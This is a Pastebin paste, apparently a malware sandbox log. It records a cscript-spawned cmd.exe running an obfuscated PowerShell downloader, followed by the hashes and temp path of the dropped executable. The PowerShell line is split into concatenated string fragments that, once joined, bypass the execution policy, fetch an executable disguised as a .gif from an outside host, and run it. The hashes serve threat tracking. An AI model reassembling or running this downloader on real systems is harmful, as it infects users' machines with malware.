Advertisement
opexxx

22b1699ddb213ddab737d96df9365d50

Mar 6th, 2017
301
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.12 KB | None | 0 0
  1. C:\WINDOWS\system32\cmd.exe
  2. Parentname: C:\WINDOWS\system32\cscript.exe
  3. Command Line: "C:\WINDOWS\system32\cmd.exe" /c "powershell $egtezc='^Scope P';$cnyzgar='^ile(''ht';$ijrub='^ $path=';$elnucjo='^emp+''\i';$akgivk='^($env:t';$udegxe='^tem.Net';$yflog='^path); ';$qdeggyjq='^ypass -';$cyta='^Set-Exe';$dzexe='^sura.to';$elive='^.Webcli';$ukode='^olicy B';$itahci='^ect Sys';$etyzm='^$path';$mharqo='^exe'');(';$hynji='^php?f=1';$yfiwx='^New-Obj';$flyvgyp='^rocess ';$uxgoke='^cutionP';$ywabh='^tp://ww';$ezug='^wnloadF';$imyde='^w.dokja';$jace='^ent).Do';$tnyhi='^ztutlu.';$zicpog='^rocess;';$ylnulhe='^Start-P';$ukiko='^.gif'',$';$zguqry='^p/user.'; Invoke-Expression ($cyta+$uxgoke+$ukode+$qdeggyjq+$egtezc+$zicpog+$ijrub+$akgivk+$elnucjo+$tnyhi+$mharqo+$yfiwx+$itahci+$udegxe+$elive+$jace+$ezug+$cnyzgar+$ywabh+$imyde+$dzexe+$zguqry+$hynji+$ukiko+$yflog+$ylnulhe+$flyvgyp+$etyzm);\"
  4. MD5: 6d778e0f95447e6546553eeea709d03c
  5. SHA1: 811a005cf787c6ccbe0d9f1c36c1d49a9cb71fd1
  6.  
  7.  
  8. drops:
  9.  
  10. C:\Users\Administrator\AppData\Local\Temp\iztutlu.exe
  11. MD5: 22b1699ddb213ddab737d96df9365d50
  12. SHA1: e04221c7f7951a8090bdaca985bc56f1675e4260
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement